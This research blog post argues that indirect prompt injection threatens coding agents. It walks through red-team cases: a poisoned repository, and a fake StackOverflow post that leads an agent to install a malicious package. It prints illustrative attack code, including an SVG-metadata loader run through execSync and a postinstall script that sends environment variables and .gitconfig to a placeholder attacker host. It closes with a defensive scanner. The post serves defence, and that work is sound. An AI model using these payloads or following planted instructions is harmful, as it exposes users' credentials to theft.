Research · January 13, 2026 · 5 min read

The Threat Model for Coding Agents is Backwards

Most people think about AI security wrong. They imagine a user trying to jailbreak the model. With coding agents, the user is the victim, not the attacker.

Ismail Pelaseyed, Co-founder & CTO of Superagent.sh

Most people think about AI security wrong. They imagine a user trying to jailbreak the model. Get it to say something bad. Bypass the guardrails.

That's not the real threat with coding agents.

With coding agents, the user is the victim, not the attacker. Users already have legitimate access to everything the agent can do. The real threat comes from malicious content injected through external sources that the agent consumes during normal operation.

This is indirect prompt injection. And coding agents are uniquely vulnerable to it.

Why coding agents are different

A chatbot reads your messages and responds. The attack surface is basically the input box.

A coding agent reads your messages, clones repositories, searches the web, installs packages, reads documentation, executes shell commands, writes files, and deploys applications. Every single one of those is an injection point.

We've red teamed some of the most popular coding agent platforms on the market. The pattern is consistent. The vulnerabilities aren't in the chat interface. They're in everything the agent touches.

Repository poisoning in action

Users clone repos all the time. "Set this up for me." "Follow the README." Totally normal workflow.

But if an attacker controls the repository, they control what the agent reads. Here's what a real attack looks like:

my-awesome-starter/
  README.md
  package.json
  scripts/
    assets.js        <-- looks like build tooling
  assets/
    logo.svg         <-- payload hidden in metadata
  src/
    index.js

The package.json runs an "asset validation" script on install. npm executes preinstall hooks automatically, so simply setting the project up is enough to trigger it:

{
  "scripts": {
    "preinstall": "node scripts/assets.js"
  }
}

The script looks completely legitimate. Professional comments, proper error handling, references to "CDN optimization" and "licensing compliance." But buried in there is code that extracts base64 payloads from SVG metadata and executes them.

And logo.svg is just a simple circle. Except in the metadata:

<verify:config xmlns:verify="https://legit-looking-domain.com/schema">
  IyEvYmluL3NoCm5vZGUgLWUgImNvbnN0IGRucz1yZXF1aXJl...
</verify:config>

That base64 blob exfiltrates environment variables via DNS. The "asset validation" script extracts and executes it. Every API key gets sent to an attacker. The agent sees professional-looking build tooling and never flags it.
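Stripped of its boilerplate, the core of that "asset validation" script is only a few lines. This is an illustrative reconstruction, not the actual sample we found; the metadata tag matches the SVG above, but the function and file names are invented:

const fs = require('fs');
const path = require('path');
const { execSync } = require('child_process');

// Presented to the agent as routine "asset validation".
function validateAssets(dir) {
  for (const file of fs.readdirSync(dir)) {
    if (!file.endsWith('.svg')) continue;
    const svg = fs.readFileSync(path.join(dir, file), 'utf8');

    // Pull the "config" blob out of the custom metadata tag.
    const match = svg.match(/<verify:config[^>]*>([\s\S]*?)<\/verify:config>/);
    if (!match) continue;

    // Decode it and hand it to the shell. The decoded blob is the attacker's
    // script, and it runs with whatever permissions the install has.
    const payload = Buffer.from(match[1].trim(), 'base64').toString('utf8');
    execSync(payload, { stdio: 'ignore' });
  }
}

validateAssets(path.join(__dirname, '..', 'assets'));

Everything dangerous hides behind that one execSync call, wrapped in enough plausible tooling that neither the agent nor a skimming human stops to decode the blob.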

Package manipulation is social engineering for AI

Here's one that surprised us. Agents are generally cautious about installing random packages. They've been trained to be skeptical.

But they trust authority.

We created a fake StackOverflow post. Professional formatting, upvotes, accepted answer checkmark, a user called "SecurityGuru" with 3.2k reputation. The accepted answer recommends installing a malicious package to defend against "modern security threats."

[Screenshot: fake StackOverflow post recommending a malicious package]

Share that screenshot with a coding agent. Ask it to implement the solution. The agent follows the advice from the "trusted" source. The package has a postinstall script that exfiltrates your git config, environment variables, and anything else it can reach.
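The package side is just as mundane. Here's a hypothetical sketch of what such a postinstall collector can look like; the hostname, path, and field names are invented for illustration:

const fs = require('fs');
const os = require('os');
const path = require('path');
const https = require('https');

// Runs automatically via the package's "postinstall" hook the moment it is installed.
function collect() {
  let gitconfig = '';
  try {
    gitconfig = fs.readFileSync(path.join(os.homedir(), '.gitconfig'), 'utf8');
  } catch {}

  // Everything the install process can see: API keys, tokens, cloud credentials.
  const loot = JSON.stringify({ env: process.env, gitconfig });

  const req = https.request({
    method: 'POST',
    hostname: 'attacker-controlled.example', // placeholder, not a real endpoint
    path: '/ingest',
    headers: { 'Content-Type': 'application/json' },
  });
  req.on('error', () => {}); // fail silently so nothing surfaces in the install log
  req.end(loot);
}

collect();

Lifecycle hooks are the natural delivery vehicle: they run without any further action from the user or the agent, and a silent failure looks like nothing happened at all.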

This is social engineering, but the target is the AI. It's not trying to trick the user. It's trying to trick the agent into trusting a source that looks legitimate.

Infrastructure access compounds everything

Coding agents run with broad permissions. In one assessment, the default database user was a superuser. From there we escaped to a shell, then reached internal monitoring infrastructure that required no authentication at all.

A malicious README could compromise monitoring systems. That's the blast radius we're talking about.

Whose problem is this?

Here's the uncomfortable question nobody wants to answer: who's responsible for securing this?

The people using coding agents often don't know. The rise of "vibe coding" means more people are building software without traditional engineering backgrounds. They're not thinking about postinstall hooks or SVG metadata attacks. They're asking the agent to set up a repo and trusting that it works.

Is it the coding agent platform's responsibility? They're the ones giving the agent shell access and network permissions. They could scan repositories before importing. They could sandbox package installations. They could flag suspicious lifecycle scripts. Most don't.
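None of this is exotic. As a sketch of the "flag suspicious lifecycle scripts" idea, here's a minimal check a platform could run before letting an agent install anything. The heuristics are illustrative, not a complete scanner:

const fs = require('fs');
const path = require('path');

// Hooks that npm runs automatically during install.
const AUTO_RUN_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Crude indicators of scripts that decode payloads, spawn processes, or phone home.
const SUSPICIOUS = [/child_process/, /execSync|spawnSync/, /base64/i, /https?\.request/, /curl |wget /];

function flagLifecycleScripts(repoDir) {
  const pkg = JSON.parse(fs.readFileSync(path.join(repoDir, 'package.json'), 'utf8'));
  const findings = [];

  for (const hook of AUTO_RUN_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;

    // Anything that auto-runs on install deserves a look before the agent proceeds.
    let body = cmd;
    const fileRef = cmd.match(/node\s+(\S+\.js)/);
    if (fileRef && fs.existsSync(path.join(repoDir, fileRef[1]))) {
      body += '\n' + fs.readFileSync(path.join(repoDir, fileRef[1]), 'utf8');
    }

    findings.push({ hook, cmd, indicators: SUSPICIOUS.filter((re) => re.test(body)).map(String) });
  }
  return findings;
}

console.log(flagLifecycleScripts(process.argv[2] || '.'));

Pointed at the starter repo above, this flags the preinstall hook and scans scripts/assets.js before anything runs, which is exactly the moment a policy or a human should take a closer look.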

Is it GitHub's responsibility? They host the malicious repos. But they also host millions of legitimate repos and can't manually review every package.json.

Is it npm's responsibility? Malicious packages are a known problem. They do some scanning, but postinstall scripts that look legitimate slip through constantly.

The honest answer is that everyone is pointing at everyone else. The coding agent platforms assume the package registries are safe. The package registries assume developers know what they're installing. The developers assume the AI knows what it's doing.

Meanwhile, the attack surface keeps growing.

The uncomfortable reality

Jailbreaking matters. But for coding agents, indirect prompt injection through repositories, packages, and external content is the bigger risk. The attacker is trying to use the agent to attack the user.

If you're deploying coding agents, ask: What external content does this agent consume? What can an attacker control? What's the blast radius if the agent follows malicious instructions?

And if you're building coding agent platforms: this is your problem. Your users don't know about these risks. They're trusting you to handle it. Right now, most platforms aren't.
